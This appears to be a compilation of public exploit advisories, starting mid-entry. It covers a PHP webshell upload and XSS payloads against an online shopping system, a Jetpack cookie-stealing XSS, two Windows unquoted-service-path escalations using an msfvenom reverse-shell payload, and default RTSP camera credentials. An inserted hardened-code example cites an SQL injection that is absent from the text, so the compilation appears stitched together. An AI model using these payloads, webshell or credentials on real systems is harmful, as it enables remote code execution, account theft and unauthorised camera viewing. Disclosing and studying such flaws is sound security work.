CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE: CWE-434

Vulnerability description:

File Restriction Bypass vulnerabilities were found in Online shopping system advanced v1.0. This allows an authenticated user to potentially obtain RCE via a webshell.

Proof of concept:

1. Go to add product (admin/add_product.php)
2. Select product image and load a valid image.
3. Turn Burp/ZAP Intercept On
4. Select webshell - ex: shell.php
5. Alter the request in the upload... Update 'filename' to the desired extension, ex: shell.php. It is not necessary to change the content type to 'image/png'.

Example exploitation request:
====================================================================================================
POST http://127.0.0.1/online/admin/add_product.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: multipart/form-data; boundary=---------------------------184982084830387
Content-Length: 960
Origin: http://127.0.0.1
Connection: keep-alive
Referer: http://127.0.0.1/online/admin/add_product.php
Cookie: PHPSESSID=cbj0b7afni7t7hpl5opt207263
Upgrade-Insecure-Requests: 1
Host: 127.0.0.1

-----------------------------184982084830387
Content-Disposition: form-data; name="product_name"

demo2
-----------------------------184982084830387
Content-Disposition: form-data; name="details"

demo2
-----------------------------184982084830387
Content-Disposition: form-data; name="picture"; filename="shell.php"
Content-Type: image/gif

<?php echo "<pre>";system($_REQUEST['cmd']);echo "</pre>" ?>
-----------------------------184982084830387
Content-Disposition: form-data; name="price"

1
-----------------------------184982084830387
Content-Disposition: form-data; name="product_type"

1
-----------------------------184982084830387
Content-Disposition: form-data; name="brand"

1
-----------------------------184982084830387
Content-Disposition: form-data; name="tags"

Summet
-----------------------------184982084830387
Content-Disposition: form-data; name="submit"


-----------------------------184982084830387--
====================================================================================================
6. To view the webshell path go to Product List (admin/cosmetics_list.php)
7. Send the request and visit your new webshell. Ex:

http://127.0.0.1/online/product_images/1600959116_shell.php?cmd=whoami

nt authority\system

# Vulnerability Type: stored Cross-Site Scripting (XSS) - #1

CVSS v3: 6.5
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79

Vulnerability description:

Online shopping system advanced v1.0 does not sufficiently encode user-controlled inputs, resulting in a stored Cross-Site Scripting (XSS) vulnerability via the admin/edit_user.php, in multiple parameters.

Proof of concept:

Stored:

POST http://127.0.0.1/online/admin/edit_user.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: multipart/form-data; boundary=---------------------------120411781422335
Content-Length: 496
Origin: http://127.0.0.1
Connection: keep-alive
Referer: http://127.0.0.1/online/admin/edit_user.php?user_id=25
Cookie: PHPSESSID=cbj0b7afni7t7hpl5opt207263
Upgrade-Insecure-Requests: 1
Host: 127.0.0.1

-----------------------------120411781422335
Content-Disposition: form-data; name="user_id"

25
-----------------------------120411781422335
Content-Disposition: form-data; name="email"

otheruser@gmail.com
-----------------------------120411781422335
Content-Disposition: form-data; name="password"

</td><script>alert(1);</script><td>
-----------------------------120411781422335
Content-Disposition: form-data; name="btn_save"


-----------------------------120411781422335--

# Vulnerability Type: stored Cross-Site Scripting (XSS) - #2

CVSS v3: 6.5
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79

Vulnerability description:

Online shopping system advanced v1.0 does not sufficiently encode user-controlled inputs, resulting in a stored Cross-Site Scripting (XSS) vulnerability via the admin/add_user.php, in multiple parameters.

Proof of concept:

Stored:

POST http://127.0.0.1/online/admin/add_user.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 192
Origin: http://127.0.0.1
Connection: keep-alive
Referer: http://127.0.0.1/online/admin/add_user.php
Cookie: PHPSESSID=cbj0b7afni7t7hpl5opt207263
Upgrade-Insecure-Requests: 1
Host: 127.0.0.1

first_name=demo&last_name=demo&email=demo%40localhost.inet&user_password=demo&mobile=5555555555&address1=%3C%2Ftd%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Ctd%3E&address2=here+5&btn_save=

# Vulnerability Type: reflected Cross-Site Scripting (XSS) - #1

CVSS v3: 6.1
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79

Vulnerability description:

Online shopping system advanced v1.0 does not sufficiently encode user-controlled inputs, resulting in a reflected Cross-Site Scripting (XSS) vulnerability via the admin/clothes_list.php, in the page parameter.

Proof of concept:

Reflected:

http://127.0.0.1/online/admin/clothes_list.php?page=%3C%2Fh1%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Ch1%3E

# Vulnerability Type: reflected Cross-Site Scripting (XSS) - #2

CVSS v3: 6.1
CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
CWE: CWE-79

Vulnerability description:

Online shopping system advanced v1.0 does not sufficiently encode user-controlled inputs, resulting in a reflected Cross-Site Scripting (XSS) vulnerability via the admin/cosmetics_list.php, in the page parameter.

Proof of concept:

Reflected:

http://127.0.0.1/online/admin/cosmetics_list.php?page=%3C%2Fh1%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3Ch1%3E
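Hardened replacements for the two handlers this advisory exercises, added here as an example (not the project's code): the edit_user.php update that is hit by SQLi #1 and stored XSS #1, and the add_product.php picture upload behind the RCE. It assumes a PDO connection in $pdo, a users table with user_id, email and password columns, and an upload directory product_images/; those names are assumptions, not taken from the application.

```php
<?php
// Added example, not the project's code: hardened replacements for the
// edit_user.php update (SQLi #1, stored XSS #1) and the add_product.php picture
// upload (RCE). $pdo, the users table and its columns are assumptions.

/** Encode a value before it is echoed into HTML; apply it to every field the list pages print. */
function e(?string $value): string
{
    return htmlspecialchars((string) $value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

/**
 * user_id is validated as an integer and bound as a parameter, so a value such as
 * "25' AND SLEEP(5) AND 'HGWF'='HGWF" is rejected before any SQL is built and
 * could never become part of the SQL text anyway.
 */
function updateUser(PDO $pdo, array $post): bool
{
    $userId   = filter_var($post['user_id'] ?? null, FILTER_VALIDATE_INT);
    $email    = filter_var($post['email'] ?? '', FILTER_VALIDATE_EMAIL);
    $password = (string) ($post['password'] ?? '');
    if ($userId === false || $email === false || $password === '') {
        return false;
    }
    $stmt = $pdo->prepare(
        'UPDATE users SET email = :email, password = :hash WHERE user_id = :id'
    );
    return $stmt->execute([
        ':email' => $email,
        ':hash'  => password_hash($password, PASSWORD_DEFAULT),
        ':id'    => $userId,
    ]);
}

/**
 * The client-supplied filename and Content-Type header are ignored entirely:
 * the bytes decide the type, the stored name is random, and the extension
 * comes from a fixed allowlist, so "shell.php" sent with "Content-Type: image/gif"
 * never gets a .php name under product_images/.
 * Returns the stored file name, or null if the upload was rejected.
 */
function storeProductImage(array $file, string $targetDir): ?string
{
    $allowed = ['image/png' => 'png', 'image/jpeg' => 'jpg', 'image/gif' => 'gif'];
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        return null;
    }
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!isset($allowed[$mime]) || getimagesize($file['tmp_name']) === false) {
        return null;
    }
    $name = bin2hex(random_bytes(16)) . '.' . $allowed[$mime];
    $dest = rtrim($targetDir, '/\\') . DIRECTORY_SEPARATOR . $name;
    return move_uploaded_file($file['tmp_name'], $dest) ? $name : null;
}

// Usage (constructed, in place of the original handlers):
// $ok   = updateUser($pdo, $_POST);
// $name = storeProductImage($_FILES['picture'] ?? [], __DIR__ . '/../product_images');
// echo '<td>' . e($row['address1']) . '</td>';
```

A file that is a valid GIF can still carry PHP source, so the allowlisted extension is what keeps the server from ever executing an upload; in addition, configure the web server so that nothing under product_images/ is handed to the PHP interpreter.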
-
Jetpack 11.4 - Cross Site Scripting (XSS)
# Exploit Title: Jetpack 11.4 - Cross Site Scripting (XSS)
# Date: 2022-10-19
# Author: Behrouz Mansoori
# Software Link: https://wordpress.org/plugins/jetpack
# Version: 11.4
# Tested on: Mac m1
# CVE: N/A

1. Description:

This plugin creates a Jetpack from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting.

2. Proof of Concept:

http://localhost/modules/contact-form/grunion-form-view.php?post_id=<script>alert(document.cookie)</script>
-
HDD Health 4.2.0.112 - 'HDDHealth' Unquoted Service Path
# Exploit Title: HDD Health 4.2.0.112 - 'HDDHealth' Unquoted Service Path
# Exploit Author: Jorge Manuel Lozano Gómez
# Date: 2022-10-19
# Vendor Homepage: https://www.panterasoft.com
# Software Link: https://hdd-health.softonic.com
# Version : 4.2.0.112
# Tested on: Windows 11 64bit
# CVE : N/A

About Unquoted Service Path :
==============================
When a service is created whose executable path contains spaces and isn't enclosed within quotes, this leads to a vulnerability known as Unquoted Service Path, which allows a user to gain SYSTEM privileges (only if the vulnerable service is running with SYSTEM privilege level, which most of the time it is).

Description:
==============================
HDD Health installs a service with an unquoted service path. To properly exploit this vulnerability, the local attacker must insert an executable file in the path of the service. Upon service restart or system reboot, the malicious code will be run with elevated privileges.

# PoC
===========
1. Open CMD and check for the vulnerability by typing [ wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """ ]
2. The vulnerable service would show up.
3. Check the service permissions by typing [ sc qc "HDDHealth" ]
4. The command would return..

C:\>sc qc "HDDHealth"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: HDDHealth
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : C:\Program Files (x86)\HDD Health\HDDHealthService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : HDDHealth
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

5. This concludes that the service is running as SYSTEM.
6. Now create a payload with msfvenom or other tools and name it HDDHealthService.exe.
7. Make sure you have write permissions to the "C:\Program Files (x86)\HDD Health" directory.
8. Provided that you have the right permissions, drop the HDDHealthService.exe executable you created into the "C:\Program Files (x86)\HDD Health" directory.
9. Start a listener.
9. Now restart the HDDHealth service by giving the command [ sc stop HDDHealth ] followed by [ sc start HDDHealth ]
9.1 If you cannot stop and start the service, since the service is of type "AUTO_START" we can restart the system by executing [ shutdown /r /t 0 ] and get the shell when the service starts automatically.
10. Got shell.

During my testing :
Payload : msfvenom -p windows/shell_reverse_tcp -f exe -o HDDHealthService.exe

# Disclaimer
=============
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere.
-
SugarSync 4.1.3 - 'SugarSync Service' Unquoted Service Path
# Exploit Title: SugarSync 4.1.3 - 'SugarSync Service' Unquoted Service Path
# Exploit Author: Jorge Manuel Lozano Gómez
# Date: 2022-10-20
# Vendor Homepage: https://www1.sugarsync.com
# Software Link: https://www1.sugarsync.com/apps/windows/
# Version : 4.1.3
# Tested on: Windows 11 64bit
# CVE : N/A

About Unquoted Service Path :
==============================
When a service is created whose executable path contains spaces and isn't enclosed within quotes, this leads to a vulnerability known as Unquoted Service Path, which allows a user to gain SYSTEM privileges (only if the vulnerable service is running with SYSTEM privilege level, which most of the time it is).

Description:
==============================
SugarSync installs a service with an unquoted service path. To properly exploit this vulnerability, the local attacker must insert an executable file in the path of the service. Upon service restart or system reboot, the malicious code will be run with elevated privileges.

# PoC
===========
1. Open CMD and check for the vulnerability by typing [ wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """ ]
2. The vulnerable service would show up.
3. Check the service permissions by typing [ sc qc "SugarSync Service" ]
4. The command would return..

C:\>sc qc "SugarSync Service"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: SugarSync Service
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\SugarSync\SugarSyncSvc.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : SugarSync Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

5. This concludes that the service is running as SYSTEM.
6. Now create a payload with msfvenom or other tools and name it SugarSyncSvc.exe.
7. Make sure you have write permissions to the "C:\Program Files (x86)\SugarSync" directory.
8. Provided that you have the right permissions, drop the SugarSyncSvc.exe executable you created into the "C:\Program Files (x86)\SugarSync" directory.
9. Start a listener.
9. Now restart the SugarSync service by giving the command [ sc stop "SugarSync Service" ] followed by [ sc start "SugarSync Service" ]
9.1 If you cannot stop and start the service, since the service is of type "AUTO_START" we can restart the system by executing [ shutdown /r /t 0 ] and get the shell when the service starts automatically.
10. Got shell.

During my testing :
Payload : msfvenom -p windows/shell_reverse_tcp -f exe -o SugarSyncSvc.exe

# Disclaimer
=============
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere.
-
Tapo C310 RTSP server v1.3.0 - Unauthorised Video Stream Access
# Exploit Title: Tapo C310 RTSP server v1.3.0 - Unauthorised Video Stream Access
# Date: 19th July 2022
# Exploit Author: dsclee1
# Vendor Homepage: tp-link.com
# Software Link: http://download.tplinkcloud.com/firmware/Tapo_C310v1_en_1.3.0_Build_220328_Rel.64283n_u_1649923652150.bin
# Version: 1.3.0
# Tested on: Linux - running on camera
# CVE : CVE-2022-37255

These Tapo cameras work via an app. There is a facility in the app to set up a "Camera Account", which adds user details for the RTSP server. Unfortunately, if you don't set up the user details on versions 1.3.0 and below, there are default login details. I sourced these from the "cet" binary on the camera. You can gain unauthorised access to the RTSP stream using the following user details:

User: ---
Password: TPL075526460603